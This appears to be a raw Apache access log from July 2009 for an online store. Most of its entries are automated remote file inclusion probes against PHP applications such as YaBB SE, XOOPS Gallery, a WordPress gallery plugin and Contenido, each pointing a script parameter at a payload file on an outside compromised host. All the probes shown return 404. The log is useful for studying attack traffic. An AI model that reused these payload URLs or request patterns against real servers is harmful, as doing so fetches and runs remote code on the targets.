65.254.32.2 - - [16/Jul/2009:02:25:10 -0400] "GET /logs/access_log.Q109051800%20%20//galeria.php?start=0&kategoria=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
65.254.32.2 - - [16/Jul/2009:02:25:14 -0400] "GET /logs/access_log.Q109060100%20%20//galeria.php?start=0&kategoria=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
220.231.126.252 - - [16/Jul/2009:02:25:38 -0400] "GET /logs/access_log.Q109052700%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
220.231.126.252 - - [16/Jul/2009:02:25:44 -0400] "GET /logs/access_log.Q109052700%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
220.231.126.252 - - [16/Jul/2009:02:28:01 -0400] "GET /logs/error_log.Q109051700%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
74.53.131.2 - - [16/Jul/2009:02:28:12 -0400] "GET /logs/access_log.Q109050900//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://freebetfan.com/tmp/ab.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
74.53.131.2 - - [16/Jul/2009:02:28:12 -0400] "GET /logs/access_log.Q109050900//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://freebetfan.com/tmp/ab.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
220.231.126.252 - - [16/Jul/2009:02:28:14 -0400] "GET /logs/error_log.Q109051700%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jul/2009:02:28:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.208.136.216 - - [16/Jul/2009:02:28:44 -0400] "GET /errors.php?error=http://www.msgwebmailcontrol.com/botp/idz.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.828"
89.208.136.216 - - [16/Jul/2009:02:28:44 -0400] "GET /logs/access_log.Q109061700/errors.php?error=http://www.msgwebmailcontrol.com/botp/idz.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.828"
89.208.136.216 - - [16/Jul/2009:02:28:44 -0400] "GET /logs/errors.php?error=http://www.msgwebmailcontrol.com/botp/idz.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.828"
89.208.136.216 - - [16/Jul/2009:02:28:46 -0400] "GET /logs/access_log.Q109060400/errors.php?error=http://www.msgwebmailcontrol.com/botp/idz.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.828"
92.48.127.79 - - [16/Jul/2009:02:30:44 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
92.48.127.79 - - [16/Jul/2009:02:30:44 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
92.48.127.79 - - [16/Jul/2009:02:30:44 -0400] "GET /logs/access_log.Q109052700//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
72.30.161.230 - - [16/Jul/2009:02:30:49 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
87.106.245.84 - - [16/Jul/2009:02:31:29 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://business.cnu.ac.kr/~economics/file/bbs/rgboard/1.jpg? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.106.245.84 - - [16/Jul/2009:02:31:29 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://business.cnu.ac.kr/~economics/file/bbs/rgboard/1.jpg? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
87.106.245.84 - - [16/Jul/2009:02:31:29 -0400] "GET /logs/access_log.Q109062400%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://business.cnu.ac.kr/~economics/file/bbs/rgboard/1.jpg? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
72.30.161.230 - - [16/Jul/2009:02:30:50 -0400] "GET /logs/access_log.Q109052700 HTTP/1.0" 200 4217417 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.106.245.84 - - [16/Jul/2009:02:32:12 -0400] "GET /logs/access_log.Q109061200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://business.cnu.ac.kr/~economics/file/bbs/rgboard/1.jpg? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:02:32:21 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://aboutav.com//id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:02:32:21 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://aboutav.com//id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:02:32:21 -0400] "GET /logs/access_log.Q109051600%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://aboutav.com//id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
92.48.127.79 - - [16/Jul/2009:02:32:46 -0400] "GET /logs/access_log.Q109052700%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jul/2009:02:33:15 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.23.158.226 - - [16/Jul/2009:02:33:17 -0400] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
65.23.158.226 - - [16/Jul/2009:02:33:18 -0400] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
65.23.158.226 - - [16/Jul/2009:02:33:18 -0400] "GET /logs/access_log.Q109062200/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
65.23.158.226 - - [16/Jul/2009:02:33:18 -0400] "GET /logs/access_log.Q109050800/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
190.144.44.36 - - [16/Jul/2009:02:33:18 -0400] "GET /logs/access_log.Q109050700%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:02:33:26 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://aboutav.com//id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:02:33:26 -0400] "GET /logs/access_log.Q109051600%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://aboutav.com//id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:02:33:26 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://aboutav.com//id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:02:33:33 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://aboutav.com//id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
92.48.127.79 - - [16/Jul/2009:02:33:35 -0400] "GET /logs/access_log.Q109050900%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:02:34:08 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:02:34:08 -0400] "GET /logs/access_log.Q109051600%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:02:34:08 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:02:34:24 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:02:34:24 -0400] "GET /logs/access_log.Q109051600%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:02:34:24 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:02:34:29 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:02:34:47 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:02:35:20 -0400] "GET /logs/access_log.Q109051600%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:02:35:20 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:02:35:20 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:02:36:04 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
79.174.68.88 - - [16/Jul/2009:02:36:37 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
79.174.68.88 - - [16/Jul/2009:02:36:37 -0400] "GET ///vwar/backup/errors.php?error=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
79.174.68.88 - - [16/Jul/2009:02:36:37 -0400] "GET /logs/access_log.Q109061700%20%20///vwar/backup/errors.php?error=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
79.174.68.88 - - [16/Jul/2009:02:36:39 -0400] "GET /logs/access_log.Q109051000%20%20///vwar/backup/errors.php?error=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:02:36:53 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:02:36:53 -0400] "GET /logs/access_log.Q109062300%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:02:36:53 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:02:37:00 -0400] "GET /logs/access_log.Q109052900%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
79.174.68.88 - - [16/Jul/2009:02:37:01 -0400] "GET ///vwar/backup/errors.php?error=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
79.174.68.88 - - [16/Jul/2009:02:37:01 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
79.174.68.88 - - [16/Jul/2009:02:37:01 -0400] "GET /logs/access_log.Q109061700%20%20///vwar/backup/errors.php?error=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
79.174.68.88 - - [16/Jul/2009:02:37:01 -0400] "GET /logs/access_log.Q109051000%20%20///vwar/backup/errors.php?error=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.236.242.164 - - [16/Jul/2009:02:37:15 -0400] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
211.236.242.164 - - [16/Jul/2009:02:37:15 -0400] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.236.242.164 - - [16/Jul/2009:02:37:16 -0400] "GET /logs/access_log.Q109062200%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.236.242.164 - - [16/Jul/2009:02:37:17 -0400] "GET /logs/access_log.Q109050800%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:02:37:19 -0400] "GET /logs/access_log.Q109062300%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:02:37:19 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:02:37:19 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:02:37:28 -0400] "GET /logs/access_log.Q109052900%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:02:37:50 -0400] "GET /logs/access_log.Q109050700%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jul/2009:02:38:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
82.197.131.40 - - [16/Jul/2009:02:38:19 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
82.197.131.40 - - [16/Jul/2009:02:38:19 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
82.197.131.40 - - [16/Jul/2009:02:38:19 -0400] "GET /logs/access_log.Q109062300%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
82.197.131.40 - - [16/Jul/2009:02:38:26 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
82.197.131.40 - - [16/Jul/2009:02:38:26 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
82.197.131.40 - - [16/Jul/2009:02:38:26 -0400] "GET /logs/access_log.Q109062300%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
67.18.63.194 - - [16/Jul/2009:02:38:31 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
67.18.63.194 - - [16/Jul/2009:02:38:31 -0400] "GET /logs/access_log.Q109062300%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
67.18.63.194 - - [16/Jul/2009:02:38:31 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
82.197.131.40 - - [16/Jul/2009:02:38:39 -0400] "GET /logs/access_log.Q109052900%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
67.18.63.194 - - [16/Jul/2009:02:38:40 -0400] "GET /logs/access_log.Q109052900%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
82.197.131.40 - - [16/Jul/2009:02:38:46 -0400] "GET /logs/access_log.Q109052900%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
193.33.21.12 - - [16/Jul/2009:02:38:49 -0400] "GET /logs/access_log.Q109052700/contrib/yabbse/poc.php?sourcedir=http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
193.33.21.12 - - [16/Jul/2009:02:38:49 -0400] "GET /contrib/yabbse/poc.php?sourcedir=http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
193.33.21.12 - - [16/Jul/2009:02:38:49 -0400] "GET /logs/contrib/yabbse/poc.php?sourcedir=http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
211.236.242.164 - - [16/Jul/2009:02:38:52 -0400] "GET /logs/access_log.Q109050800/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.236.242.164 - - [16/Jul/2009:02:38:52 -0400] "GET /logs/access_log.Q109062200/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
193.33.21.12 - - [16/Jul/2009:02:38:56 -0400] "GET /errors.php?error=http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
66.249.68.70 - - [16/Jul/2009:02:38:57 -0400] "GET /images/items/index15_dressmat.jpg HTTP/1.1" 200 3987 "-" "Googlebot-Image/1.0"
76.12.17.218 - - [16/Jul/2009:02:40:17 -0400] "GET /logs/access_log.Q109062300//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:02:40:17 -0400] "GET /logs/access_log.Q109052900//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
121.78.116.209 - - [16/Jul/2009:02:40:42 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.otr.co.kr/bbs/files/1.jpg? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
121.78.116.209 - - [16/Jul/2009:02:40:43 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.otr.co.kr/bbs/files/1.jpg? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
121.78.116.209 - - [16/Jul/2009:02:40:43 -0400] "GET /logs/access_log.Q109061300%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.otr.co.kr/bbs/files/1.jpg? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
121.78.116.209 - - [16/Jul/2009:02:41:22 -0400] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.otr.co.kr/bbs/files/1.jpg? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
92.48.127.79 - - [16/Jul/2009:02:41:30 -0400] "GET /logs/access_log.Q109050900//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
121.78.116.209 - - [16/Jul/2009:02:41:33 -0400] "GET /logs/access_log.Q109070600%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.otr.co.kr/bbs/files/1.jpg? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:02:41:37 -0400] "GET /logs/access_log.Q109050700%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
67.18.63.194 - - [16/Jul/2009:02:41:40 -0400] "GET /logs/access_log.Q109062300//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
67.18.63.194 - - [16/Jul/2009:02:41:40 -0400] "GET /logs/access_log.Q109052900//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
75.74.201.182 - - [16/Jul/2009:02:42:12 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L018C5D4638F4D5006AB100W+M37+ENG HTTP/1.1" 200 76286 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018C5D4A3C749500518100W+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1) Gecko/20090624 Firefox/3.5"
75.74.201.182 - - [16/Jul/2009:02:42:37 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118C8644345435003D11002+M37+ENG HTTP/1.1" 200 49784 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018C5D4638F4D5006AB100W+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1) Gecko/20090624 Firefox/3.5"
75.74.201.182 - - [16/Jul/2009:02:42:54 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118C8644345435003D11002+M37+ENG HTTP/1.1" 200 50279 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018C5D4638F4D5006AB100W+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1) Gecko/20090624 Firefox/3.5"
75.74.201.182 - - [16/Jul/2009:02:42:55 -0400] "GET /images/items/CALCIUMSULFATE_THUMB.JPG HTTP/1.1" 200 2715 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C8644345435003D11002+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1) Gecko/20090624 Firefox/3.5"
121.78.116.209 - - [16/Jul/2009:02:42:56 -0400] "GET /logs/access_log.Q109052300%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.otr.co.kr/bbs/files/1.jpg? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jul/2009:02:43:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
84.201.208.50 - - [16/Jul/2009:02:43:26 -0400] "GET //vwar/backup/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.r?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
84.201.208.50 - - [16/Jul/2009:02:43:26 -0400] "GET /logs//vwar/backup/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.r?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
84.201.208.50 - - [16/Jul/2009:02:43:26 -0400] "GET /logs/access_log.Q109070300%20%20//vwar/backup/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.r?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
121.78.116.209 - - [16/Jul/2009:02:43:30 -0400] "GET /logs/access_log.Q109061300//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.otr.co.kr/bbs/files/1.jpg? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:02:44:14 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:02:44:14 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:02:44:14 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:02:44:14 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:02:44:14 -0400] "GET /logs/access_log.Q109052700%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:02:44:14 -0400] "GET /logs/access_log.Q109052700%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
